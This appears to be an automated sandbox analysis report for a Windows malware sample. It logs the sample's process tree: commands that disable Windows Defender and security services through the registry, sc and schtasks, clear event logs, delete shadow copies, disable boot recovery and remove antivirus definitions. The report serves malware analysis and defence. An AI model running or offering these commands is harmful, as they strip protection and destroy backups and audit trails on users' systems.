PID 2340 wrote to memory of 700 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2340 wrote to memory of 1868 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2340 wrote to memory of 1868 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2340 wrote to memory of 808 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2340 wrote to memory of 808 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2340 wrote to memory of 1544 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2340 wrote to memory of 1544 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2340 wrote to memory of 2468 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2340 wrote to memory of 2468 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2340 wrote to memory of 4036 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2340 wrote to memory of 4036 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2340 wrote to memory of 2436 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2340 wrote to memory of 2436 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2340 wrote to memory of 1460 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2340 wrote to memory of 1460 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2340 wrote to memory of 1840 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe PID 2340 wrote to memory of 1840 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe PID 2340 wrote to memory of 2044 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe PID 2340 wrote to memory of 2044 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe PID 2340 wrote to memory of 2128 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe PID 2340 wrote to memory of 2128 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe PID 2340 wrote to memory of 2268 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe PID 2340 wrote to memory of 2268 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe PID 2340 wrote to memory of 4024 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe PID 2340 wrote to memory of 4024 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3244
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3536 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:3580
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:3320
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:2300
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:3360
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1812
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:500
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1160
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_12bb5" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_12bb5" /y3⤵PID:600
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:908
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:700
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1868
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:808
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:1544
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:2468
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:4036
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2436
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_12bb5" start= disabled2⤵PID:1460
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1840
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2044
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2128
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:2268
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:4024
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2876
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:2232
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1424
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3672
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:3260
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:2184
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1064
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:2712
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:3016
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3764
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:584
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:3932
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:2012
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1512
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:3204
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:3100
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:3104
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1268
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1316
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:600 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1780 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3232 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:984
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1276
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1324
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2348
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1872 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2152
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2120 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3024 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2076 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2988 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3664 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3856 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3176 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1200 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2880
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:3716 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:3352
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3516 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2944
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:504
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
b542b2f7ad50bfae9c77a70ccb99c9c0
SHA1f2bce1dda10cbc4dee0668ce46e690d1244b1cbd
SHA256ac61d455d56fba36bf0c0e7fc23927e0c76825b86670abe5d3eb295ab36b2810
SHA5125bf10b52890d9161caafc2bbf400322f3d48704969053c91c83bd697bb45cb4e987cfed4398fc7b9423aec7741fbe798cf1d11c1119fc817ef3d9ed0706b6bd9